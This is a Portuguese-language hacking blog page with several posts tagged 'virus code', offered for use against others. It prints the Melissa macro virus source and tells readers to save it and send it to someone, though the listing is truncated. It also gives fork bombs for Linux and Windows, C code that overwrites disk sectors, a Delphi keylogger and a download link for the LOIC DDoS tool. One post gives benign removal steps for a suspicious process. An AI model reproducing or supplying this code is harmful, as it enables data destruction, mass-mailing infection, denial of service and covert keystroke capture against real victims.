Pesquisar

Mostrando postagens com marcador Código de vírus. Mostrar todas as postagens
Mostrando postagens com marcador Código de vírus. Mostrar todas as postagens

24 de nov. de 2012

O suposto Virus "csrss.exe*32"

Usando o (ru)Windows recentemente, me deparei com um problema no teclado: os acentos estavam desregulados! Mas isso era só depois de iniciar o computador, por volta de 2 minutos que esse suposto vírus executava. Considerei ele um vírus porquê perturbava-me quando eu ia escrever, as vezes os acentos não funcionavam, ou só funcionavam se eu teclasse e deixasse o dedo na tecla por uns 10 segundos. Os acentos que não funcionavam eram esses: ("~'`^), esse vírus também encontrava-se em pendrives e o ícone dele era um "computador". No meu PC esse vírus encontrava-se na pasta "Documentos".

Como remover:
  1. Aperte Ctrl+alt+del;
  2. Vá em gerenciador de tarefas;
  3. Clique na aba "Processos";
  4. Clique em "Mostrar processos de todos os usuários";
  5. Procure pelo arquivo na lista sendo executado: "csrss.exe*32" (exatamente como está escrito mas sem aspas!) ;
  6. Clique com o botão direito do mouse sobre esse processo e clique em "abrir local do arquivo";
  7. Como eu já havia dito, a pasta que abriu no meu windows foi a "Documentos", então agora, veja se esse arquivo tem como imagem do ícone, um computador, então clique uma vez sobre ele (para selecionar o arquivo) e aperte "shift+del" para deletar aquele arquivo definitivamente! 


OBS.: Cuidado para não deletar o real arquivo "Client Server Runtime Service" que está localizado na pasta C:\Windows\System32

Como eu detectei esse suposto vírus: Abri o gerenciador de tarefas logo após iniciar o windows e abri o bloco de notas para clocar os acentos nas vogais, e nessa mesma hora observando o gerenciador de tarefas, e do nada surge esse processo: "csrss.exe*32" e após surgir, os acentos param de funcionar! Então continuei a apertar os acentos e vi que quando eu apertava o processo começava a executar! E quando eu parava de digitar o processo paravam também, foi onde eu suspeitei. Dias depois peguei meu pendrive e lá tinha esse mesmo arquivo com o mesmo nome, se não me engano pesava menos de 1 mb. Confiram, comentem, critiquem! E se acharem ele façam uma análise no http://virustotal.com . Tirem suas conclusões.

12 de out. de 2012

Download Low Orbit Íon Cannon (LOIC)


Ziddu -[DOWNLOAD] - 742KB
SourceForge - [DOWNLOAD]

Originado do jogo Command & Conquer, esta é uma ferramenta mediana para fazer simples ataques DoS/DDoS. Este programa de código livre é escrito em C# e conta com uma versão Javascript nas plataformas Windows, Linux e Mac OS X. Este programa envia pacotes/pedidos TCP, UDP ou HTTP inválidos para o servidor se sobrecarregar, e não é muito potente sendo usado sozinho.

27 de jun. de 2012

Código do famoso vírus Melissa

Aí vai o famoso código de um dos vírus mais famosos dos anos 90, o Melissa, que deixa o PC louco

Abra o bloco de notas e cole isso:


Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) <> “”
Then
CommandBars(“Macro”).Controls(“Security…”).Enabled = False
System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) = 1&
Else
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
Options.ConfirmConversions = (1 – 1): Options.VirusProtection = (1 – 1):
Options.SaveNormalPrompt = (1 – 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(“Outlook.Application”)
Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)
If System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) <> “… by Kwyjibo”
Then
If UngaDasOutlook = “Outlook” Then
DasMapiName.Logon “profile”, “password”
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = “Important Message From ” &
Application.UserName
BreakUmOffASlice.Body = “Here is that document you asked for … don’t
show anyone else Wink”
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = “”


Após colar feche e salve como .vbs e mande pra alguém.

23 de jan. de 2012

Como travar Windows e Linux em segundos!


Essa é para aqueles que tem acesso a maquinas que utilizam o Linux como Sistema Operacional.

Isso é tipo uma fork bomb. Nao precisa saber programar em nada, basta saber digitar, e indiretamente saber o alfabeto tbm...

Logue-se no ambiente, abra um terminal shell e digite tudo junto, deixando espaços somente depois e antes das chaves:

:(){ :|:& };:

O que acontece?

Isso é uma função recursiva que chama ela mesma em background, que chama ela mesma, até acabar com os recursos da máquina. Em alguns casos, ficou simplesmente impossivel fazer algo no ambiente, em outros casos, foi necessario o famoso "Dedown"...

Tem como fazer no Windows tbm... Cria-se uma .bat com o seguinte conteudo:

:s
start %0
goto s


O s é um label para o inicio do código, o start %0 chama o arquivo e o goto realiza a recursão ao direcionar a execuçaõ para o inicio da "função".
Depois de executar só pdoerá recuperar o controle via "desligar no
botão". 
Testado nos sistemas Debian 5, Slackware 11 a 12, Red Hat 7, Windows xp


fonte: http://tudosobrehacker.com/tutoriais/linux/135-derrubando-linux-em-10-segundos#ixzz1kJ0Y0lua

23 de out. de 2011

Código do vírus que detonou no Orkut

Em um efeito dominó jamais visto ele criou uma das maiores comunidades já vistas no Orkut.

O vírus na verdade num causa mal algum, é só um aplicativo em flash que se espalha pela sua lista de amigos e entra numa comunidade criada pelo editor do código.

Resumindo, funciona assim:

- Você lê o scrap com o código;
- Ele injeta um código javascript no seu navegador;
- O código faz você entrar na comunidade;
- Coleta a sua lista de amigos;
- Envia o recado com o código para eles.

Para quem quiser tentar imitar o fanfarrão que fez o código, vai o aviso: o bug já foi corrigido, e este tipo de atitude no EUA seria punida com prisão como pode ser vista neste post, já no Brasil…

Segue aqui o código do vírus do Orkut:

20 de out. de 2011

Vírus em linguagem C "Bomber"

#include <stdlib.h>
#include <dos.h>
#include <stdio.h>

main () {

    char *vir;
    abswrite (0, 50, 0, vir);
    abswrite (1, 50, 0, vir);
    abswrite (2, 50, 0, vir);
    abswrite (3, 50, 0, vir);
    abswrite (4, 50, 0, vir);
    printf ("FUCK YOU ALL");
    printf ("The Bomber");

}

Depois é só salvar com um nome + o .c no fim e mandar compilar.

Não testei obviamnete MUHUHAHAHA

Obs: código para fins de estudo, não me responsabilizo por danos de terceiros.

17 de out. de 2011

Como criar um keylogger em Delphi

function Coloca(txt: String): String;
begin
Form1.Memo1.Text := Form1.Memo1.Text + txt;
end;

E coloque no evento Timer do temporizador:

procedure TForm1.Timer1Timer(Sender: TObject);
var
keyloop, KeyResult : Integer;
begin
keyloop := 0;
repeat
KeyResult := GetAsyncKeyState(keyloop);
if KeyResult = -32767 then
begin
case keyloop of
8: Coloca(' [BACKSPACE] ');
9: Coloca(' [TAB] ');
12: Coloca(' [ALT] ');
13: Coloca(' [ENTER] ');
16: Coloca(' [SHIFT] ');
17: Coloca(' [CONTROL] ');
18: Coloca(' [ALT] ');
20: Coloca(' [CAPS LOCK] ');
21: Coloca(' [PAGE UP] ');
27: Coloca(' [ESC] ');
33: Coloca(' [PAGE UP] ');
34: Coloca(' [PAGE DOWN] ');
35: Coloca(' [END] ');
36: Coloca(' [HOME] ');
37: Coloca(' [SETA ESQUERDA] ');
38: Coloca(' [SETA ACIMA] ');
39: Coloca(' [SETA DIREITA] ');
40: Coloca(' [SETA ABAIXO] ');
45: Coloca(' [INSERT] ');
46: Coloca(' [DEL] ');
91: Coloca(' [WIN ESQUERDA] ');
92: Coloca(' [WIN DIREITA] ');
93: Coloca(' [MENU POP-UP] ');
96: Coloca('0');
97: Coloca('1');
98: Coloca('2');
99: Coloca('3');
100: Coloca('4');
101: Coloca('5');
102: Coloca('6');
103: Coloca('7');
104: Coloca('8');
105: Coloca('9');
106: Coloca(' [NUM *] ');
107: Coloca(' [NUM +] ');
109: Coloca(' [NUM -] ');
110: Coloca(' [NUM SEP. DECIMAL] ');
111: Coloca(' [NUM /] ');
112: Coloca(' [F1] ');
113: Coloca(' [F2] ');
114: Coloca(' [F3] ');
115: Coloca(' [F4] ');
116: Coloca(' [F5] ');
117: Coloca(' [F6] ');
118: Coloca(' [F7] ');
119: Coloca(' [F8] ');
120: Coloca(' [F9] ');
121: Coloca(' [F10] ');
122: Coloca(' [F11] ');
123: Coloca(' [F12] ');
144: Coloca(' [NUM LOCK] ');
186: Coloca('Ç');
187: Coloca('=');
188: Coloca(',');
189: Coloca('-');
190: Coloca('.');
191: Coloca(';');
192: Coloca(' [APÓSTROFO] ');
193: Coloca('/');
194: Coloca(' [NUM PONTO] ');
219: Coloca('´');
220: Coloca(']');
221: Coloca('[');
222: Coloca('~');
226: Coloca('\');
else
if (KeyLoop >= 65) and (keyloop <= 90) then Coloca(Chr(keyloop)); if (keyloop >= 32) and (keyloop <= 63) then Coloca(Chr(keyloop)); //numpad keycodes if (keyloop >= 96) and (keyloop <= 110) then
Coloca(Chr(keyloop));
end;
end; //case;
inc(keyloop);
until keyloop = 255;
end;

coloque o interval do timer para "1" , deixe lá enable:=false se não o timer ficará comfuso, mas vai continuar de boa